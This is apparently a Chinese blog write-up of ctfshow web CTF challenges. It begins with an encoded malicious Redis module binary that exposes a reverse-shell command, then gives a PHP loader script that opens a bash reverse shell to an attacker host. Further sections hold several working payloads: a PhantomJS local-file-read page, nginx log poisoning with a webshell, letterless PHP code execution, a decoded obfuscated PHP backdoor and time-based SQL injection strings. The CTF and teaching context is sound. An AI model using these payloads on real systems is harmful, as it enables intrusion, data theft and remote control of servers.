2R1bGVfS2V5VHlwZQBSZWRpc01vZHVsZV9Nb2R1bGVUeXBlU2V0VmFsdWUAcGNsb3NlQEBHTElCQ18yLjIuNQBSZWRpc01vZHVsZV9ac2V0TGFzdEluTGV4UmFuZ2UAUmVkaXNNb2R1bGVfWnNldEluY3JieQBSZWRpc01vZHVsZV9TdHJpbmdUb0xvbmdMb25nAFJlZGlzTW9kdWxlX0xvYWRTaWduZWQAUmVkaXNNb2R1bGVfTG9hZFN0cmluZ0J1ZmZlcgBSZWRpc01vZHVsZV9Mb2FkRG91YmxlAFJlZGlzTW9kdWxlX1pzZXRSYW5nZVN0b3AAUmVkaXNNb2R1bGVfTGlzdFB1c2gAUmVkaXNNb2R1bGVfT25Mb2FkAFJlZGlzTW9kdWxlX1N0cmluZ0RNQQBSZWRpc01vZHVsZV9NaWxsaXNlY29uZHMAUmVkaXNNb2R1bGVfT3BlbktleQBSZWRpc01vZHVsZV9WYWx1ZUxlbmd0aABmZ2V0c0BAR0xJQkNfMi4yLjUAZXhlY3ZlQEBHTElCQ18yLjIuNQBSZWRpc01vZHVsZV9HZXRDb250ZXh0RmxhZ3MAaW5ldF9hZGRyQEBHTElCQ18yLjIuNQBSZWRpc01vZHVsZV9BbGxvYwBSZWRpc01vZHVsZV9EaWN0RGVsQwBSZWRpc01vZHVsZV9HZXRTZWxlY3RlZERiAFJlZGlzTW9kdWxlX1dyb25nQXJpdHkAUmVkaXNNb2R1bGVfQ2FsbFJlcGx5QXJyYXlFbGVtZW50AFJlZGlzTW9kdWxlX0RpY3RJdGVyYXRvclJlc2Vla0MAUmVkaXNNb2R1bGVfU3RyaW5nU2V0AFJlZGlzTW9kdWxlX1JlcGx5V2l0aERvdWJsZQBSZWRpc01vZHVsZV9GcmVlRGljdABSZWRpc01vZHVsZV9HZXRFeHBpcmUAUmVkaXNNb2R1bGVfRGlnZXN0QWRkU3RyaW5nQnVmZmVyAFJlZGlzTW9kdWxlX1pzZXRGaXJzdEluTGV4UmFuZ2UAbWFsbG9jQEBHTElCQ18yLjIuNQBSZWRpc01vZHVsZV9HZXRDbGllbnRJZABSZWRpc01vZHVsZV9MaXN0UG9wAFJldlNoZWxsQ29tbWFuZABfZW5kAFJlZGlzTW9kdWxlX1N0cmluZ1RydW5jYXRlAFJlZGlzTW9kdWxlX0xvZ0lPRXJyb3IAUmVkaXNNb2R1bGVfRGlnZXN0RW5kU2VxdWVuY2UAUmVkaXNNb2R1bGVfUmVwbHlXaXRoU3RyaW5nAFJlZGlzTW9kdWxlX0RpY3RDb21wYXJlAHJlYWxsb2NAQEdMSUJDXzIuMi41AF9fYnNzX3N0YXJ0AFJlZGlzTW9kdWxlX1JldGFpblN0cmluZwBSZWRpc01vZHVsZV9TdHJpbmdBcHBlbmRCdWZmZXIAUmVkaXNNb2R1bGVfQ3JlYXRlU3RyaW5nRnJvbUxvbmdMb25nAFJlZGlzTW9kdWxlX1pzZXRGaXJzdEluU2NvcmVSYW5nZQBSZWRpc01vZHVsZV9Mb2cAUmVkaXNNb2R1bGVfR2V0QXBpAFJlZGlzTW9kdWxlX0NyZWF0ZVN0cmluZ1ByaW50ZgBSZWRpc01vZHVsZV9EaWN0UmVwbGFjZQBSZWRpc01vZHVsZV9SZXBseVdpdGhFcnJvcgBwb3BlbkBAR0xJQkNfMi4yLjUAUmVkaXNNb2R1bGVfRGljdEl0ZXJhdG9yU3RhcnQAUmVkaXNNb2R1bGVfVW5saW5rS2V5AFJlZGlzTW9kdWxlX01vZHVsZVR5cGVHZXRWYWx1ZQBSZWRpc01vZHVsZV9EaWN0Q29tcGFyZUMAUmVkaXNNb2R1bGVfS2V5QXRQb3MAUmVkaXNNb2R1bGVfQXV0b01lbW9yeQBSZWRpc01vZHVsZV9EaWN0RGVsAFJlZGlzTW9kdWxlX0RlbGV0ZUtleQBSZWRpc01vZHVsZV9DcmVhdGVDb21tYW5kAGF0b2lAQEdMSUJDXzIuMi41AFJlZGlzTW9kdWxlX1pzZXRSYW5nZUVuZFJlYWNoZWQAUmVkaXNNb2R1bGVfRGljdFJlcGxhY2VDAFJlZGlzTW9kdWxlX0NhbGxSZXBseUludGVnZXIAc3RyY2F0QEBHTElCQ18yLjIuNQBSZWRpc01vZHVsZV9TYXZlU3RyaW5nAFJlZGlzTW9kdWxlX1pzZXRBZGQAUmVkaXNNb2R1bGVfRGljdE5leHRDAFJlZGlzTW9kdWxlX1NldEV4cGlyZQBSZWRpc01vZHVsZV9ac2V0UmFuZ2VQcmV2AFJlZGlzTW9kdWxlX0ZyZWVDYWxsUmVwbHkAUmVkaXNNb2R1bGVfRGljdEl0ZXJhdG9yUmVzZWVrAFJlZGlzTW9kdWxlX01vZHVsZVR5cGVHZXRUeXBlAGNvbm5lY3RAQEdMSUJDXzIuMi41AFJlZGlzTW9kdWxlX0Nsb3NlS2V5AFJlZGlzTW9kdWxlX0RpY3RHZXRDAFJlZGlzTW9kdWxlX1pzZXRSYW5nZUN1cnJlbnRFbGVtZW50AFJlZGlzTW9kdWxlX1JlcGx5V2l0aEFycmF5AFJlZGlzTW9kdWxlX0RpY3RQcmV2QwBSZWRpc01vZHVsZV9EaWN0U2l6ZQBSZWRpc01vZHVsZV9Mb2FkVW5zaWduZWQAUmVkaXNNb2R1bGVfRGljdE5leHQAUmVkaXNNb2R1bGVfUmVwbHlXaXRoQ2FsbFJlcGx5AFJlZGlzTW9kdWxlX1NhdmVTaWduZWQAUmVkaXNNb2R1bGVfTG9hZEZsb2F0AFJlZGlzTW9kdWxlX0NhbGxSZXBseUxlbmd0aABSZWRpc01vZHVsZV9GcmVlU3RyaW5nAFJlZGlzTW9kdWxlX1pzZXRTY29yZQBSZWRpc01vZHVsZV9ac2V0UmFuZ2VOZXh0AFJlZGlzTW9kdWxlX0NyZWF0ZVN0cmluZwBSZWRpc01vZHVsZV9TdHJpbmdQdHJMZW4AUmVkaXNNb2R1bGVfWnNldExhc3RJblNjb3JlUmFuZ2UAc29ja2V0QEBHTElCQ18yLjIuNQBSZWRpc01vZHVsZV9SZXBseVdpdGhOdWxsAFJlZGlzTW9kdWxlX0NhbGwAAC5zeW10YWIALnN0cnRhYgAuc2hzdHJ0YWIALmdudS5oYXNoAC5keW5zeW0ALmR5bnN0cgAuZ251LnZlcnNpb24ALmdudS52ZXJzaW9uX3IALnJlbGEucGx0AC50ZXh0AC5yb2RhdGEALmVoX2ZyYW1lAC5keW5hbWljAC5nb3QucGx0AC5ic3MALmNvbW1lbnQALmRlYnVnX2FyYW5nZXMALmRlYnVnX2luZm8ALmRlYnVnX2FiYnJldgAuZGVidWdfbGluZQAuZGVidWdfc3RyAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAfAAAABQAAAAIAAAAAAAAAWAEAAAAAAABYAQAAAAAAAFwEAAAAAAAAAwAAAAAAAAAIAAAAAAAAAAQAAAAAAAAAGwAAAPb%2F%2F28CAAAAAAAAALgFAAAAAAAAuAUAAAAAAAAcBAAAAAAAAAMAAAAAAAAACAAAAAAAAAAAAAAAAAAAACUAAAALAAAAAgAAAAAAAADYCQAAAAAAANgJAAAAAAAAsA0AAAAAAAAEAAAAAQAAAAgAAAAAAAAAGAAAAAAAAAAtAAAAAwAAAAIAAAAAAAAAiBcAAAAAAACIFwAAAAAAADMNAAAAAAAAAAAAAAAAAAABAAAAAAAAAAAAAAAAAAAANQAAAP%2F%2F%2F28CAAAAAAAAALwkAAAAAAAAvCQAAAAAAAAkAQAAAAAAAAMAAAAAAAAAAgAAAAAAAAACAAAAAAAAAEIAAAD%2B%2F%2F9vAgAAAAAAAADgJQAAAAAAAOAlAAAAAAAAMAAAAAAAAAAEAAAAAQAAAAgAAAAAAAAAAAAAAAAAAABRAAAABAAAAEIAAAAAAAAAECYAAAAAAAAQJgAAAAAAAGgBAAAAAAAAAwAAAA0AAAAIAAAAAAAAABgAAAAAAAAAVgAAAAEAAAAGAAAAAAAAAIAnAAAAAAAAgCcAAAAAAAAAAQAAAAAAAAAAAAAAAAAAEAAAAAAAAAAQAAAAAAAAAFsAAAABAAAABgAAAAAAAACAKAAAAAAAAIAoAAAAAAAAEhIAAAAAAAAAAAAAAAAAAAEAAAAAAAAAAAAAAAAAAABhAAAAAQAAAAIAAAAAAAAAmDoAAAAAAACYOgAAAAAAAL8MAAAAAAAAAAAAAAAAAAAIAAAAAAAAAAAAAAAAAAAAaQAAAAEAAAACAAAAAAAAAFhHAAAAAAAAWEcAAAAAAADEAAAAAAAAAAAAAAAAAAAACAAAAAAAAAAAAAAAAAAAAHMAAAAGAAAAAwAAAAAAAACgTiAAAAAAAKBOAAAAAAAAYAEAAAAAAAAEAAAAAAAAAAgAAAAAAAAAEAAAAAAAAAB8AAAAAQAAAAMAAAAAAAAAAFAgAAAAAAAAUAAAAAAAAJAAAAAAAAAAAAAAAAAAAAAIAAAAAAAAAAgAAAAAAAAAhQAAAAgAAAADAAAAAAAAAJBQIAAAAAAAkFAAAAAAAADgAwAAAAAAAAAAAAAAAAAACAAAAAAAAAAAAAAAAAAAAIoAAAABAAAAMAAAAAAAAAAAAAAAAAAAAJBQAAAAAAAAKwAAAAAAAAAAAAAAAAAAAAEAAAAAAAAAAQAAAAAAAACTAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAC7UAAAAAAAADAAAAAAAAAAAAAAAAAAAAABAAAAAAAAAAAAAAAAAAAAogAAAAEAAAAAAAAAAAAAAAAAAAAAAAAA61AAAAAAAAD1HgAAAAAAAAAAAAAAAAAAAQAAAAAAAAAAAAAAAAAAAK4AAAABAAAAAAAAAAAAAAAAAAAAAAAAAOBvAAAAAAAAPwIAAAAAAAAAAAAAAAAAAAEAAAAAAAAAAAAAAAAAAAC8AAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAfcgAAAAAAABkDAAAAAAAAAAAAAAAAAAABAAAAAAAAAAAAAAAAAAAAyAAAAAEAAAAwAAAAAAAAAAAAAAAAAAAAOHUAAAAAAAD7EgAAAAAAAAAAAAAAAAAAAQAAAAAAAAABAAAAAAAAAAEAAAACAAAAAAAAAAAAAAAAAAAAAAAAADiIAAAAAAAACBAAAAAAAAAWAAAAGgAAAAgAAAAAAAAAGAAAAAAAAAAJAAAAAwAAAAAAAAAAAAAAAAAAAAAAAABAmAAAAAAAAAoOAAAAAAAAAAAAAAAAAAABAAAAAAAAAAAAAAAAAAAAEQAAAAMAAAAAAAAAAAAAAAAAAAAAAAAASqYAAAAAAADTAAAAAAAAAAAAAAAAAAAAAQAAAAAAAAAAAAAAAAAAAA%3D%3D

可以检验下是否上传成功

image-20220721125848717

接下来利用php的redis拓展写个php脚本来加载恶意so文件反弹shell

<?php
$redis = new Redis();
$redis->connect('127.0.0.1',8888);
$redis->auth('ye_w4nt_a_gir1fri3nd');
$redis->rawCommand('module','load','/var/www/html/shell.so');
$redis->rawCommand("system.exec","bash -c 'exec bash -i &>/dev/tcp/your VPSIP/port <&1'");

需要将其先base64后再进行url编码,避免特殊字符如=+的影响

同样先上传

?exp=file_put_contents('shell.php',base64_decode($_POST['shell']));

image-20220721130525589

然后访问shell.php加载so文件,反弹shell成功

image-20220721130602228

接下来提权和上面一样

image-20220721130622413

GameV4.0

在data.js里,base64解码即可

image-20220721194656462

image-20220721195017104

CTFshow36D杯

RemoteImageDownloader

可以访问下载外网文件

image-20220722134015816

考点为PhantomJS任意文件读取

POC

<html>
	<head>
	<body>
	<script>
	x=new XMLHttpRequest;
	x.onload=function(){
	document.write(this.responseText)
	};
	x.open("GET","file:///flag");
	x.send();
	</script>
	</body>
	</head>
</html>

在自己服务器上创建此html,然后在题目中去访问即可下载flag图片

image-20220729190142616

ALL_INFO_U_WANT

进入题目是一个魔方游戏

image-20220722140956700

扫描发现备份文件index.php.bak

visit all_info_u_want.php and you will get all information you want

= =Thinking that it may be difficult, i decided to show you the source code:


<?php
error_reporting(0);

//give you all information you want
if (isset($_GET['all_info_i_want'])) {
    phpinfo();
}

if (isset($_GET['file'])) {
    $file = "/var/www/html/" . $_GET['file'];
    //really baby include
    include($file);
}

?>



really really really baby challenge right?

存在get参数all_info_i_want就会回显phpinfo,同时会包含传入的file参数

nginx日志默认路径是/var/log/nginx/access.log

往User-Agent写入一句话木马

image-20220722142253327

然后蚁剑连接,跟目录下发现flag文件

image-20220722142439846

说明flag在/etc中

grep -r "ctfshow" /etc

image-20220722142911942

你取吧

直接给源码

<?php
error_reporting(0);
show_source(__FILE__);
$hint=file_get_contents('php://filter/read=convert.base64-encode/resource=hhh.php');
$code=$_REQUEST['code'];
$_=array('a','b','c','d','e','f','g','h','i','j','k','m','n','l','o','p','q','r','s','t','u','v','w','x','y','z','\~','\^');
$blacklist = array_merge($_);
foreach ($blacklist as $blacklisted) {
    if (preg_match ('/' . $blacklisted . '/im', $code)) {
        die('nonono');
    }
}
eval("echo($code);");
?>

过滤了所有字母,和~,^,说明取反异或都不行了

解法一(利用数组下标进行取值)

因为$[]都没被过滤,所以可以利用数组下标来取值绕过

如:system == $_[18].$_[24].$_[18].$_[19].$_[4].$_[11]

而在php中反引号可以用来执行命令

所以直接构造ls / => $_[13]$_[18] / ,然后再用``来执行

image-20220722145346869

然后构造cat /flag即可

?code=`$_[2]$_[0]$_[19] /$_[5]$_[13]$_[0]$_[6]`

image-20220722145528776

解法二(无字母RCE)

需要用1),(1来闭合echo

/GET
?code=1);$_=[];$_=@"$_";$_=$_['!'=='@'];$___=$_;$__=$_;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$___.=$__;$___.=$__;$__=$_;$__++;$__++;$__++;$__++;$___.=$__;$__=$_;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$___.=$__;$__=$_;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$___.=$__;$____='_';$__=$_;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$____.=$__;$__=$_;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$____.=$__;$__=$_;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$____.=$__;$__=$_;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$____.=$__;$_=$$____;$___($_[_]);(1

/POST
_=system('cat /flag');

记得要url编码一下,不然+就没了

image-20220722150620656

解法三(预期解)

读取源码中的$hint,还是利用数组下标

?code=${$_{7}.$_{8}.$_{12}.$_{19}}

image-20220723155102412

base64下得到一个压缩包和一个hint.php

<?php
$a="/phpjiami.zip\n/hint.php";
?

解压压缩包发现一个混淆文件

网上找的解密脚本

<?php

function decrypt($data, $key)
{
    $data_1 = '';
    for ($i = 0; $i < strlen($data); $i++) {
        $ch = ord($data[$i]);
        if ($ch < 245) {
            if ($ch > 136) {
                $data_1 .= chr($ch / 2);
            } else {
                $data_1 .= $data[$i];
            }
        }
    }
    $data_1 = base64_decode($data_1);
    $key = md5($key);
    $j = $ctrmax = 32;
    $data_2 = '';
    for ($i = 0; $i < strlen($data_1); $i++) {
        if ($j <= 0) {
            $j = $ctrmax;
        }
        $j--;
        $data_2 .=  $data_1[$i] ^ $key[$j];
    }
    return $data_2;
}

function find_data($code)
{
    $code_end = strrpos($code, '?>');
    if (!$code_end) {
        return "";
    }
    $data_start = $code_end + 2;
    $data = substr($code, $data_start, -46);
    return $data;
}

function find_key($code)
{
    // $v1 = $v2('bWQ1');
    // $key1 = $v1('??????');
    $pos1 = strpos($code, "('" . preg_quote(base64_encode('md5')) . "');");
    $pos2 = strrpos(substr($code, 0, $pos1), '$');
    $pos3 = strrpos(substr($code, 0, $pos2), '$');
    $var_name = substr($code, $pos3, $pos2 - $pos3 - 1);
    $pos4 = strpos($code, $var_name, $pos1);
    $pos5 = strpos($code, "('", $pos4);
    $pos6 = strpos($code, "')", $pos4);
    $key = substr($code, $pos5 + 2, $pos6 - $pos5 - 2);
    return $key;
}

$input_file = $argv[1];
$output_file = $argv[1] . '.decrypted.php';

$code = file_get_contents($input_file);

$data = find_data($code);
if (!$code) {
    echo '未找到加密数据', PHP_EOL;
    exit;
}

$key = find_key($code);
if (!$key) {
    echo '未找到秘钥', PHP_EOL;
    exit;
}

$decrypted = decrypt($data, $key);
$uncompressed = gzuncompress($decrypted);
// 由于可以不勾选代码压缩的选项,所以这里判断一下是否解压成功,解压失败就是没压缩
if ($uncompressed) {
    $decrypted = str_rot13($uncompressed);
} else {
    $decrypted = str_rot13($decrypted);
}
file_put_contents($output_file, $decrypted);
echo '解密后文件已写入到 ', $output_file, PHP_EOL;
?>

直接在cmd中运行即可

image-20220723161542105

其中3.php为解密脚本,1.php为待解密文件

1.php.decrypted.phphint.php

?><?php @eval("//Encode by  phpjiami.com,Free user."); ?><?php
$ch = explode(".","hello.ass.world.er.rt.e.saucerman");
$c = $ch[1].$ch[5].$ch[4]; 
@$c($_POST[7-1]);
?>
<?php 

发现有马,直接用即可

image-20220723162720283

WUSTCTF_朴实无华_Revenge

给了源码,一看就是一个代码审计题

<?php
header('Content-type:text/html;charset=utf-8');
error_reporting(0);
highlight_file(__file__);

function isPalindrome($str){
    $len=strlen($str);
    $l=1;
    $k=intval($len/2)+1;
    for($j=0;$j<$k;$j++)
        if (substr($str,$j,1)!=substr($str,$len-$j-1,1)) {
            $l=0;
            break;
        }
    if ($l==1) return true;
    else return false;
}

//level 1
if (isset($_GET['num'])){
    $num = $_GET['num'];
    $numPositve = intval($num);
    $numReverse = intval(strrev($num));
    if (preg_match('/[^0-9.-]/', $num)) {
        die("非洲欢迎你1");
    }
    if ($numPositve <= -999999999999999999 || $numPositve >= 999999999999999999) { //在64位系统中 intval()的上限不是2147483647 省省吧
        die("非洲欢迎你2");
    }
    if( $numPositve === $numReverse && !isPalindrome($num) ){
        echo "我不经意间看了看我的劳力士, 不是想看时间, 只是想不经意间, 让你知道我过得比你好.</br>";
    }else{
        die("金钱解决不了穷人的本质问题");
    }
}else{
    die("去非洲吧");
}

//level 2
if (isset($_GET['md5'])){
    $md5=$_GET['md5'];
    if ($md5==md5(md5($md5)))
        echo "想到这个CTFer拿到flag后, 感激涕零, 跑去东澜岸, 找一家餐厅, 把厨师轰出去, 自己炒两个拿手小菜, 倒一杯散装白酒, 致富有道, 别学小暴.</br>";
    else
        die("我赶紧喊来我的酒肉朋友, 他打了个电话, 把他一家安排到了非洲");
}else{
    die("去非洲吧");
}

//get flag
if (isset($_GET['get_flag'])){
    $get_flag = $_GET['get_flag'];
    if(!strstr($get_flag," ")){
        $get_flag = str_ireplace("cat", "36dCTFShow", $get_flag);
        $get_flag = str_ireplace("more", "36dCTFShow", $get_flag);
        $get_flag = str_ireplace("tail", "36dCTFShow", $get_flag);
        $get_flag = str_ireplace("less", "36dCTFShow", $get_flag);
        $get_flag = str_ireplace("head", "36dCTFShow", $get_flag);
        $get_flag = str_ireplace("tac", "36dCTFShow", $get_flag);
        $get_flag = str_ireplace("$", "36dCTFShow", $get_flag);
        $get_flag = str_ireplace("sort", "36dCTFShow", $get_flag);
        $get_flag = str_ireplace("curl", "36dCTFShow", $get_flag);
        $get_flag = str_ireplace("nc", "36dCTFShow", $get_flag);
        $get_flag = str_ireplace("bash", "36dCTFShow", $get_flag);
        $get_flag = str_ireplace("php", "36dCTFShow", $get_flag);
        echo "想到这里, 我充实而欣慰, 有钱人的快乐往往就是这么的朴实无华, 且枯燥.</br>";
        system($get_flag);
    }else{
        die("快到非洲了");
    }
}else{
    die("去非洲吧");
}
?>
去非洲吧

level1

function isPalindrome($str){
    $len=strlen($str);
    $l=1;
    $k=intval($len/2)+1;
    for($j=0;$j<$k;$j++)
        if (substr($str,$j,1)!=substr($str,$len-$j-1,1)) {
            $l=0;
            break;
        }
    if ($l==1) return true;
    else return false;
}
//level 1
if (isset($_GET['num'])){
    $num = $_GET['num'];
    $numPositve = intval($num); //intval返回int值
    $numReverse = intval(strrev($num)); //strrev返回字符串
    if (preg_match('/[^0-9.-]/', $num)) {
        die("非洲欢迎你1");
    }
    if ($numPositve <= -999999999999999999 || $numPositve >= 999999999999999999) { //在64位系统中 intval()的上限不是2147483647 省省吧
        die("非洲欢迎你2");
    }
    if( $numPositve === $numReverse && !isPalindrome($num) ){
        echo "我不经意间看了看我的劳力士, 不是想看时间, 只是想不经意间, 让你知道我过得比你好.</br>";
    }else{
        die("金钱解决不了穷人的本质问题");
    }
}else{
    die("去非洲吧");
}

payload

?num=0.001.0

image-20220723164156821

level2

//level 2
if (isset($_GET['md5'])){
    $md5=$_GET['md5'];
    if ($md5==md5(md5($md5)))
        echo "想到这个CTFer拿到flag后, 感激涕零, 跑去东澜岸, 找一家餐厅, 把厨师轰出去, 自己炒两个拿手小菜, 倒一杯散装白酒, 致富有道, 别学小暴.</br>";
    else
        die("我赶紧喊来我的酒肉朋友, 他打了个电话, 把他一家安排到了非洲");
}else{
    die("去非洲吧");
}

要求传入参数等于2次md5后的参数的值

因为是两个等于,所以直接php弱类型绕过即可,脚本跑出0e开头的md5即可

import hashlib
def md5(s):
    return hashlib.md5(s.encode()).hexdigest()
for i in range(10**30):
    i='0e'+str(i)
    result=md5(md5(i))
    if result[0:2]=='0e' and  result[2:].isnumeric():
        print(i)

结果为0e1138100474

image-20220723164520557

level3

//get flag
if (isset($_GET['get_flag'])){
    $get_flag = $_GET['get_flag'];
    if(!strstr($get_flag," ")){
        $get_flag = str_ireplace("cat", "36dCTFShow", $get_flag);
        $get_flag = str_ireplace("more", "36dCTFShow", $get_flag);
        $get_flag = str_ireplace("tail", "36dCTFShow", $get_flag);
        $get_flag = str_ireplace("less", "36dCTFShow", $get_flag);
        $get_flag = str_ireplace("head", "36dCTFShow", $get_flag);
        $get_flag = str_ireplace("tac", "36dCTFShow", $get_flag);
        $get_flag = str_ireplace("$", "36dCTFShow", $get_flag);
        $get_flag = str_ireplace("sort", "36dCTFShow", $get_flag);
        $get_flag = str_ireplace("curl", "36dCTFShow", $get_flag);
        $get_flag = str_ireplace("nc", "36dCTFShow", $get_flag);
        $get_flag = str_ireplace("bash", "36dCTFShow", $get_flag);
        $get_flag = str_ireplace("php", "36dCTFShow", $get_flag);
        echo "想到这里, 我充实而欣慰, 有钱人的快乐往往就是这么的朴实无华, 且枯燥.</br>";
        system($get_flag);
    }else{
        die("快到非洲了");
    }
}else{
    die("去非洲吧");
}

过滤了空格和一些关键字

空格可以用<来代替,还有很多绕过空格的方法这里就不说了,关键字可以用\来分割绕过

payload

?num=0.001.0&md5=0e1138100474&get_flag=ca\t</flag

image-20220723165117268

WEB_WUSTCTF朴实无华Revenge_Revenge

前面基本差不多,就最后的目录换了下

payload

?num=0.00&md5=0e1138100474&get_flag=ca\t<\flag.p\hp

image-20220729184545109

给你shell

查看网页源代码得到源码

<?php
//It's no need to use scanner. Of course if you want, but u will find nothing.
error_reporting(0);
include "config.php";

if (isset($_GET['view_source'])) {
    show_source(__FILE__);
    die;
}

function checkCookie($s) {
    $arr = explode(':', $s);
    if ($arr[0] === '{"secret"' && preg_match('/^[\"0-9A-Z]*}$/', $arr[1]) && count($arr) === 2 ) {
        return true;
    } else {
        if ( !theFirstTimeSetCookie() ) setcookie('secret', '', time()-1);
        return false;
    }
}

function haveFun($_f_g) {
    $_g_r = 32;
    $_m_u = md5($_f_g);
    $_h_p = strtoupper($_m_u);
    for ($i = 0; $i < $_g_r; $i++) {
        $_i = substr($_h_p, $i, 1);
        $_i = ord($_i);
        print_r($_i & 0xC0);
    }
    die;
}

isset($_COOKIE['secret']) ? $json = $_COOKIE['secret'] : setcookie('secret', '{"secret":"' . strtoupper(md5('y1ng')) . '"}', time()+7200 );
checkCookie($json) ? $obj = @json_decode($json, true) : die('no');

if ($obj && isset($_GET['give_me_shell'])) {
    ($obj['secret'] != $flag_md5 ) ? haveFun($flag) : echo "here is your webshell: $shell_path";
}

die;

目标很清晰,就是要cookie中的secret等于$flag的md5值,不等于则会打印出$flag的逐位与0xC0与的结果

get传入give_me_shell,得到了 $flag的逐位与0xC0与的结果

image-20220729175953447

需要注意$_i & 0xC0其中&代表是全真即为真,有一个假即为假

所以前三位均为0说明$flag的md5的前三位为数字,而第四位开始为64,说明第四位为字母,

因为这里用的是弱等于,所以直接爆破前三位的数字即可

poc

import requests
url="http://a628508f-479e-48e5-892f-80b3f333641a.challenge.ctf.show/index.php?give_me_shell"
for i in range(1,1000):
    headers = {
        'cookie': 'secret={"secret": ' + str(i) + '}'
    }
    res = requests.post(url, headers=headers)
    if "0006464640064064646464006406464064640064006400000000000" not in res.text:
        print(headers['cookie'])
        break

跑出来secret为115,所以修改cookie中的secret为{"secret": 115}即可

image-20220729181758764

获得了一个w3b5HeLLlll123.php和flag在flag.txt里的提示

w3b5HeLLlll123.php

<?php
error_reporting(0);
session_start();


//there are some secret waf that you will never know, fuzz me if you can
require "hidden_filter.php";


if (!$_SESSION['login'])
    die('<script>location.href=\'./index.php\'</script>');


if (!isset($_GET['code'])) {
    show_source(__FILE__);
    exit();
} else {
    $code = $_GET['code'];
    if (!preg_match($secret_waf, $code)) {
        //清空session 从头再来
        eval("\$_SESSION[" . $code . "]=false;"); //you know, here is your webshell, an eval() without any disabled_function. However, eval() for $_SESSION only XDDD you noob hacker
    } else die('hacker');
}

fuzz一下,过滤了很多东西,$;^f/*&),`"'都没了

可以利用require和~取反

读flag.txt

?code=]=123?><?=require~%d0%99%93%9e%98%d1%8b%87%8b?>

image-20220729183538295

读flag

?code=]=123?><?=require~%d0%99%93%9e%98?>

image-20220729183610066

Login_Only_For_36D

用户名有admin即可进行注入,源码中发现

image-20220729185336296

过滤了引号,但是还有注释符可用,可以用\将单引号转义,if可用,但过滤了substr和ascii,mid,可用right,left,ord来代替

payload

"username":"admin\\"

"password":"or(if(ord(right(password,6))like('0'),sleep(3),1))#"

写个脚本时间盲注出密码即可

posted @ 2022-07-29 19:06  phant0m1  阅读(49)  评论(0编辑  收藏  举报